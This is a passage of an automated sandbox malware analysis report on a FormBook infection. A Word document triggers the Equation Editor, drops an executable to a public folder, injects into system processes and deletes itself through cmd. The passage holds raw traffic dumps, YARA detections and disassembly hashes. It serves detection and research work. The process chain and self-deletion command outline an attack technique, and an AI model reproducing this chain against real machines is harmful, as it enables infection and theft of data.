                                                                                                                                                                                  Jan 27, 2021 06:51:26.232531071 CET14INData Raw: 00 00 06 74 01 00 00 01 28 50 00 00 06 74 06 00 00 02 26 00 de 5b 00 fe 0c 03 00 28 49 00 00 06 75 06 00 00 01 2d 47 14 fe 0e 0c 00 fe 0c 0c 00 fe 0e 0c 00 28 1a 00 00 06 74 02 00 00 02 26 fe 0c 03 00 28 49 00 00 06 75 0d 00 00 02 fe 0e 0c 00 28
                                                                                                                                                                                  Data Ascii: t(Pt&[(Iu-G(t&(Iu(t(Iut&&(t(Pt&G(t(Pt(t(Pt(Pt&
                                                                                                                                                                                  Jan 27, 2021 06:51:26.491837978 CET15INData Raw: 0c 16 13 05 2b c5 16 0d 1c 13 05 2b be 07 75 01 00 00 1b 09 02 09 94 b4 9c 09 17 d6 0d 1c 13 05 2b a9 09 08 31 05 1a 13 05 2b a0 19 2b f9 07 74 01 00 00 1b 0a 06 75 01 00 00 1b 2a 13 30 05 00 58 00 00 00 13 00 00 11 16 0c 08 45 05 00 00 00 00 00
                                                                                                                                                                                  Data Ascii: ++u+1++tu*0XE6:6~~~~o# (+(!o$+*0+[EwQtXf)


                                                                                                                                                                                  Code Manipulations

                                                                                                                                                                                  Statistics

                                                                                                                                                                                  CPU Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  Memory Usage

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  High Level Behavior Distribution

                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                  Behavior

                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                  System Behavior

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:35
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                                                                                                                                  Imagebase:0x13fdc0000
                                                                                                                                                                                  File size:1424032 bytes
                                                                                                                                                                                  MD5 hash:95C38D04597050285A18F66039EDB456
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:36
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:543304 bytes
                                                                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:41
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Users\Public\69577.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\Public\69577.exe
                                                                                                                                                                                  Imagebase:0x830000
                                                                                                                                                                                  File size:839656 bytes
                                                                                                                                                                                  MD5 hash:BEB09E991A41577E79DFABC58178A44F
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2112664832.0000000003B66000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2112815271.0000000003CD3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:47
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
                                                                                                                                                                                  Imagebase:0x810000
                                                                                                                                                                                  File size:42176 bytes
                                                                                                                                                                                  MD5 hash:DA55A7AED2F65D6104E1A79EE067CC00
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2140353140.0000000000081000.00000020.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2140526407.00000000004D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2140472679.0000000000310000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                  • Detection: 0%, Metadefender, Browse
                                                                                                                                                                                  • Detection: 0%, ReversingLabs
                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:51:52
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                  Commandline:
                                                                                                                                                                                  Imagebase:0xffca0000
                                                                                                                                                                                  File size:3229696 bytes
                                                                                                                                                                                  MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:52:02
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                  Imagebase:0x350000
                                                                                                                                                                                  File size:44544 bytes
                                                                                                                                                                                  MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2360758305.00000000000D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                                  Reputation:moderate

                                                                                                                                                                                  General

                                                                                                                                                                                  Start time:06:52:06
                                                                                                                                                                                  Start date:27/01/2021
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:/c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
                                                                                                                                                                                  Imagebase:0x4ac20000
                                                                                                                                                                                  File size:302592 bytes
                                                                                                                                                                                  MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Code Analysis

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateProcessAsUserW.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,01FD820D,?,?,?), ref: 01FD8474
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2111200130.0000000001FD0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000004.00000002.2111192434.0000000001FC0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateProcessUser
                                                                                                                                                                                    • String ID: XQr$XQr$XQr
                                                                                                                                                                                    • API String ID: 2217836671-1491800909
                                                                                                                                                                                    • Opcode ID: cb7e2e134a5580cf78a3e032eb379d99364359b614b8e6262380615c163b5f19
                                                                                                                                                                                    • Instruction ID: 7d36e4984d5f4f2f40326afba50909b300c4111547473b0bf20683bb402b14c6
                                                                                                                                                                                    • Opcode Fuzzy Hash: cb7e2e134a5580cf78a3e032eb379d99364359b614b8e6262380615c163b5f19
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4391D275D0026D9FCF25CFA8C880BEDBBB5AF49304F1494AAE548B7210DB709A85CF94
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: ($<$ntin
                                                                                                                                                                                    • API String ID: 0-2777557274
                                                                                                                                                                                    • Opcode ID: 4d13a1903135fafafd2bb34390d0ede0c4a64ee5968bbd422171c26104dbfa21
                                                                                                                                                                                    • Instruction ID: bd9acc8f12478b4f2ff76347a5fa752d944a32d2a083a9c2a042bc6aeab94782
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d13a1903135fafafd2bb34390d0ede0c4a64ee5968bbd422171c26104dbfa21
                                                                                                                                                                                    • Instruction Fuzzy Hash: 87A2E274E042188FDB15CF99C981BDDBBF6FF8A300F2581AAD509AB255D734A981CF60
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: <$@
                                                                                                                                                                                    • API String ID: 0-1426351568
                                                                                                                                                                                    • Opcode ID: 92ac85aa9ce8a317dafab11edc6a0264f2d5e6d02e563413d53c3a7a74929311
                                                                                                                                                                                    • Instruction ID: 6e7507ab4bbd80fb89b79ae26b73aa4e126cfe3ef39c1da41301ff3332399020
                                                                                                                                                                                    • Opcode Fuzzy Hash: 92ac85aa9ce8a317dafab11edc6a0264f2d5e6d02e563413d53c3a7a74929311
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2762DB74A00619CFDB25CFA9C980A8DFBF2FF49314F55C1AAD409AB212D734A981CF55
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID: [l
                                                                                                                                                                                    • API String ID: 0-4185537904
                                                                                                                                                                                    • Opcode ID: 80d41eaecd910998f1cc849e1ae273beef1e78bf9a267356664e1f7cfda24ad8
                                                                                                                                                                                    • Instruction ID: 6fab501e4f19632338d5f6a70a622bfed88e06156d4e3f8f400c040ddcd3624f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80d41eaecd910998f1cc849e1ae273beef1e78bf9a267356664e1f7cfda24ad8
                                                                                                                                                                                    • Instruction Fuzzy Hash: B332E074900258CFDB51DFA8C585A8EFBB2FF49305F59C5AAC409AB212CB30D985CFA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 8873685f9474c218bcf67b1ef20a0ff690f60e0878540ad77614a5ac79512a06
                                                                                                                                                                                    • Instruction ID: 7aade4885d38bb975afe8263c4429b5291fee3e1784353bf9cb5ec4637ed84d3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8873685f9474c218bcf67b1ef20a0ff690f60e0878540ad77614a5ac79512a06
                                                                                                                                                                                    • Instruction Fuzzy Hash: A4428D74E05228CFDB64CFA9C984B9DBBB2FF49310F1581A9E809A7355D734AA81CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 90e90a2cf11d613ac64ef5616ffa15ea5ec9109a8d8341e67b3d52d2d2f5c487
                                                                                                                                                                                    • Instruction ID: b5acd78d0692a7c26ac40c9d20421eec071b27741c80a855b149e2e50b37b6ff
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90e90a2cf11d613ac64ef5616ffa15ea5ec9109a8d8341e67b3d52d2d2f5c487
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2D22F374E01228CFDB29DF65D848BADBBB2FF4A301F1085A9D44AA7350DB749A81CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2111200130.0000000001FD0000.00000040.00000001.sdmp, Offset: 01FC0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000004.00000002.2111192434.0000000001FC0000.00000004.00000001.sdmp Download File
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d913641f320bbf8b1ef0b2c774a294f2b773a37dca92a395bf87fb9882a8b061
                                                                                                                                                                                    • Instruction ID: c14666e6bc43c69cf8a96a242e41bdc7f2c2e6c58030900687939ab045350b80
                                                                                                                                                                                    • Opcode Fuzzy Hash: d913641f320bbf8b1ef0b2c774a294f2b773a37dca92a395bf87fb9882a8b061
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7312F074900258CFDB20DFA8C584A9DFBB2BF48315F99C595D409AB212CB31ED81CFA6
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 1a22a7660497eb483a3c3873881e0eaf0339ddf760e6e45dd9f46de0c904456d
                                                                                                                                                                                    • Instruction ID: f17bdbba2111c4c60929ae26d91531e6055da39621be0068656e70d76ffaad53
                                                                                                                                                                                    • Opcode Fuzzy Hash: 1a22a7660497eb483a3c3873881e0eaf0339ddf760e6e45dd9f46de0c904456d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 99D1CB74E00218CFDB54EFA9D984BADBBB2FF88304F1085AAD449A7265DB305A85CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6bbdeb9c034839427e243e245ed35ea61785d588cb1d97c43b1bfbdb023d5638
                                                                                                                                                                                    • Instruction ID: d6d3bb85d9a439d4544572d72d4fa1a38b9f0c5d110be302dfaffc3ccd38f0cf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bbdeb9c034839427e243e245ed35ea61785d588cb1d97c43b1bfbdb023d5638
                                                                                                                                                                                    • Instruction Fuzzy Hash: FBD1B178D04218CFDB24DFA5D988BADFBB2FB49301F2091AAD809A7354DB745A85CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 6770e33286ac6d70b828ba7e30a9fe94e047fd7fe66a3a3d35f5b4e1e29b4d2c
                                                                                                                                                                                    • Instruction ID: d919ed31394542cf587adb3c2c6db7e6821422e63468f6ae0b3073636e17efec
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6770e33286ac6d70b828ba7e30a9fe94e047fd7fe66a3a3d35f5b4e1e29b4d2c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BD1A178D04218CFDB24DFA5D988BADFBB2FB49301F2091AAD809A7354DB745A85CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 14d0a5ddfe6827ec87ab651337ed4d0e1c3125e9ad4e20541471ee1e2ab62307
                                                                                                                                                                                    • Instruction ID: 5e5424013f3ed0ae6d5480c883a769829fb806173226014c2bddbb9bbd1f0f70
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14d0a5ddfe6827ec87ab651337ed4d0e1c3125e9ad4e20541471ee1e2ab62307
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5BD1A178D04218CFDB24DFA5D988B9DFBB2FB49301F2092AAD809A7354DB745A85CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: ce59deb3a733b90976a739acb1f253875f44a7b8f790bb7e0b8398a77f996bd3
                                                                                                                                                                                    • Instruction ID: c1e95024e99a143c8b0d8f41dfe0a6e12126149b924f8069e59e4444a0f29919
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce59deb3a733b90976a739acb1f253875f44a7b8f790bb7e0b8398a77f996bd3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CB1D274E002188FDB15DFA9C840ADDFBB6FF89315F6485A9D409AB355EB30A981CF50
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 15cbc974b04d5672c9f1ea4d45e33a5d4b8d25a90c8fa083e34b0df4f79a6be6
                                                                                                                                                                                    • Instruction ID: f39207149cd8354c3a6d95560b2f162a1a829f068b1b080f62059daa4fe8d4d6
                                                                                                                                                                                    • Opcode Fuzzy Hash: 15cbc974b04d5672c9f1ea4d45e33a5d4b8d25a90c8fa083e34b0df4f79a6be6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6AA1F074E00218CFDB54EFAAD984B9DFBB2FF88304F1084AAD449A7265DB305A85CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 7efbf64064a588bcb867743649faaa2cfe1bcc5ecdf89f4abc78bf9cd96d4d02
                                                                                                                                                                                    • Instruction ID: f2001f86183d7ca8d6da40a4e206adc88d651e756d117422f71cdebf1467566e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7efbf64064a588bcb867743649faaa2cfe1bcc5ecdf89f4abc78bf9cd96d4d02
                                                                                                                                                                                    • Instruction Fuzzy Hash: AF416D687402046BF798A7F6DC29BEB614FDBC8740F14D425A306DBAD5CEF898859B10
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a3cbf78bbabcec375f6fe90f515eb810767ec68ac07a5ad536706ebfa8d3a564
                                                                                                                                                                                    • Instruction ID: b38cd21e027488f7e699cb87952f276e1368de9fc786e77a07393f962a5d9a5e
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3cbf78bbabcec375f6fe90f515eb810767ec68ac07a5ad536706ebfa8d3a564
                                                                                                                                                                                    • Instruction Fuzzy Hash: B9F0CF70D0920DEECB45DFA8C9487AEBBB0BF0A305F2086AAC455B3290E7704A85CB55
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 003AFD31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CopyFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1304948518-0
                                                                                                                                                                                    • Opcode ID: 28a2f380e243e45c8aadf6bd7f37001527e62f87a845a220bd066fdc087fe53b
                                                                                                                                                                                    • Instruction ID: e95d020ed766730946aac6ebfa04c0ab90516c7606f6b015741e270f141a284c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 28a2f380e243e45c8aadf6bd7f37001527e62f87a845a220bd066fdc087fe53b
                                                                                                                                                                                    • Instruction Fuzzy Hash: F4C1CE74E0421C8FDB25CFA9C885B9EFBB1FF49304F2481A9E819A7251D770A981CF90
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CopyFileExW.KERNEL32(?,?,?,?,?,?), ref: 003AFD31
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CopyFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1304948518-0
                                                                                                                                                                                    • Opcode ID: 8a77f1a90686ad7eaf7c5001d0f9e94acc5a92b2f4bdb996271c9a2311d27cdc
                                                                                                                                                                                    • Instruction ID: 41bb64581c6f2ccadfca1409c4578820b341d07ddfbcb9bc9e13b0b26d4a4498
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a77f1a90686ad7eaf7c5001d0f9e94acc5a92b2f4bdb996271c9a2311d27cdc
                                                                                                                                                                                    • Instruction Fuzzy Hash: E8B1D074E042188FDF25CFA9C885B9EFBB1FF4A304F1481A9E819A7251D7749A81CF51
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DeleteFile
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4033686569-0
                                                                                                                                                                                    • Opcode ID: b891a7a786f236c883b2342a084ad78ece454b5567e55521f408567f294753bb
                                                                                                                                                                                    • Instruction ID: 92b5346cbb58f2aef2631235ae45ff3d2e7659ba4e816d84bdbe1dec65b4566d
                                                                                                                                                                                    • Opcode Fuzzy Hash: b891a7a786f236c883b2342a084ad78ece454b5567e55521f408567f294753bb
                                                                                                                                                                                    • Instruction Fuzzy Hash: DC4122B5D052588FCB01CFA9D884AEEFBF5EF4A314F1880AAE444B7211D3349945CFA5
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • VirtualProtect.KERNEL32(?,?,?,?), ref: 003A5D77
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000004.00000002.2107177337.00000000003A0000.00000040.00000001.sdmp, Offset: 003A0000, based on PE: false
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                                                    • Opcode ID: e38c0aff581186ccef0d2973bb46cf602402a7c01e6201950f31fa1039b3bdb7
                                                                                                                                                                                    • Instruction ID: 4d1901ebef9a8e20970216337d112ca2429e01ff1866a568aea91618a4e2eeb2
                                                                                                                                                                                    • Opcode Fuzzy Hash: e38c0aff581186ccef0d2973bb46cf602402a7c01e6201950f31fa1039b3bdb7
